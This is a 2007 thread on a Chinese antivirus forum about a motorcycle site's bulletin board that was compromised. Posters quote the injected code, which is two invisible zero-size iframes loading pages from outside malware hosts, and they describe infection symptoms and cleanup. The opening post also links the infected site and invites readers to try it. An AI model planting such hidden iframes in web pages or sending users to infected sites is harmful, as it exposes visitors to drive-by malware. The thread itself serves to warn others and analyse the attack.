瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 一个被植入病毒的论坛,请大家小心!!!!

1   1  /  1  页   跳转

一个被植入病毒的论坛,请大家小心!!!!

收藏
行云似水
头像
初生襁褓狮
  • 帖子:158
  • 注册: 2003-02-16
  • 来自:
发表于: 2007-02-16 20:54 | 只看楼主 短消息 资料
字号: 1楼

一个被植入病毒的论坛,请大家小心!!!!

上网的时候遇到一个被植入病毒的论坛,打开杀毒软件的监控也中毒,弄了半小时才搞定.
有兴趣的朋友可以去试试.网站地址如下:
http://www.chinamotorcycle.com/bbs/index.asp
最后编辑2007-02-17 01:35:07.763000000
分享到:
gototop
 
horseluke11
头像
飘泊而立狮
  • 帖子:497
  • 注册: 2006-11-13
  • 来自:
发表于: 2007-02-16 21:12 | 短消息 资料
字号: 2楼

经检查,该论坛的确被插入如下代码;

<iframe src="hxxp://www.xxoxx.net/qq/2.htm" width=0 height=0></iframe><iframe src="hxxp://www.xaitan.com/qq/2.htm" width=0 height=0></iframe>

但是下载并用记事本打开该代码所示的第一个网页竟然是.......空白????!

站长发觉了?

第二个正在检查中
gototop
 
horseluke11
头像
飘泊而立狮
  • 帖子:497
  • 注册: 2006-11-13
  • 来自:
发表于: 2007-02-16 21:19 | 短消息 资料
字号: 3楼

第二个源代码看得好晕,反正是连环套连环、反复嵌入带毒网页的...不看了。

不过它是用了什么漏洞呢?
gototop
 
mopery
头像
卡卡技术团队
  • 帖子:17737
  • 注册: 2005-12-06
  • 来自:New York
卡卡名人堂论坛9周年纪念
发表于: 2007-02-16 21:22 | 短消息 资料
字号: 4楼

<iframe src="http://www.xxoxx.net/qq/2.htm" width=0 height=0></iframe><iframe src="http://www.xaitan.com/qq/2.htm" width=0 height=0></iframe>

http://www.xxoxx.net/qq/2.htm
网页 是空的..

http://www.xaitan.com/qq/2.htm
<h1>Service Unavailable</h1>

什么都没下载..
gototop
 
高歌猛进
头像
初生襁褓狮
  • 帖子:2377
  • 注册: 2006-10-09
  • 来自:
发表于: 2007-02-16 21:23 | 短消息 资料
字号: 5楼

下不到
gototop
 
两个铁球
头像
叱咤花甲狮
  • 帖子:3107
  • 注册: 2006-01-19
  • 来自:新疆叶城
发表于: 2007-02-16 22:11 | 短消息 资料
字号: 6楼

不懂啊!怎么回事高手教教!我的机子、卡巴等没有反应,也没见什么多的东西下来。(图)

附件附件:

下载次数:942
文件类型:image/pjpeg
文件大小:
上传时间:2007-2-16 22:11:29
描述:
gototop
 
行云似水
头像
初生襁褓狮
  • 帖子:158
  • 注册: 2003-02-16
  • 来自:
发表于: 2007-02-16 23:37 | 只看楼主 短消息 资料
字号: 7楼

可能是利用了系统的漏洞,只装反病毒软件而没有装黑客防火墙的肯定会中毒,本人装的是卡巴反病毒6.0,但没有黑客防火墙,进入网站后系统时间马上被修改,卡巴进程被杀死,应该不是真死,而是时间过期,监控失效,病毒马上入侵系统,肯定有cnwin Class这个木马,疯狂下载广告软件,然后自动安装。这时如果不马上断网,肯定被安装了大量流氓软件,重起后软件严重冲突,蓝屏或者进不了系统。
那个网站可能利用了卡巴的漏洞,如果用户安装的是其他杀毒软件可能不会出现这样的症状。不过本人没有试,本人装的是卡巴(无黑客防火墙的KAV),所以中招。
中毒后,应该马上断网,用反流氓软件先查杀,然后用杀毒软件查杀全盘。
gototop
 
两个铁球
头像
叱咤花甲狮
  • 帖子:3107
  • 注册: 2006-01-19
  • 来自:新疆叶城
发表于: 2007-02-16 23:54 | 短消息 资料
字号: 8楼

引用:
【行云似水的贴子】可能是利用了系统的漏洞,只装反病毒软件而没有装黑客防火墙的肯定会中毒,本人装的是卡巴反病毒6.0,但没有黑客防火墙,进入网站后系统时间马上被修改,卡巴进程被杀死,应该不是真死,而是时间过期,监控失效,病毒马上入侵系统,肯定有cnwin Class这个木马,疯狂下载广告软件,然后自动安装。这时如果不马上断网,肯定被安装了大量流氓软件,重起后软件严重冲突,蓝屏或者进不了系统。
那个网站可能利用了卡巴的漏洞,如果用户安装的是其他杀毒软件可能不会出现这样的症状。不过本人没有试,本人装的是卡巴(无黑客防火墙的KAV),所以中招。
中毒后,应该马上断网,用反流氓软件先查杀,然后用杀毒软件查杀全盘。
………………



呵呵。。,我装的正是卡巴的Av6(6.0.0.300),功能全开,怎么什么反应都没有?根本没有搂住你说的事。(那段代码确实有,如5楼的图)
gototop
 
mopery
头像
卡卡技术团队
  • 帖子:17737
  • 注册: 2005-12-06
  • 来自:New York
卡卡名人堂论坛9周年纪念
发表于: 2007-02-17 00:34 | 短消息 资料
字号: 9楼

那跳转里的代码被清空了..
gototop
 
两个铁球
头像
叱咤花甲狮
  • 帖子:3107
  • 注册: 2006-01-19
  • 来自:新疆叶城
发表于: 2007-02-17 01:35 | 短消息 资料
字号: 10楼

引用:
【mopery的贴子】那跳转里的代码被清空了..
………………

刚才我又试了几次,结果:第一次,不同于先前,在那个摩托网页出来的同时,我的桌面右下角紧靠任务托盘处冒出不大的泡泡提示:“恶意间谍网址被阻止(英文)”,赶紧截屏抓图,没来得及,泡泡消失,没来得及记清是卡巴的提示,还是Zone-Alarm(想来该为后者,因只有Z-A的提示是E文。)后来几次,便没有这种泡泡出来了。摩托网页正常出现。别的一切正常。
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT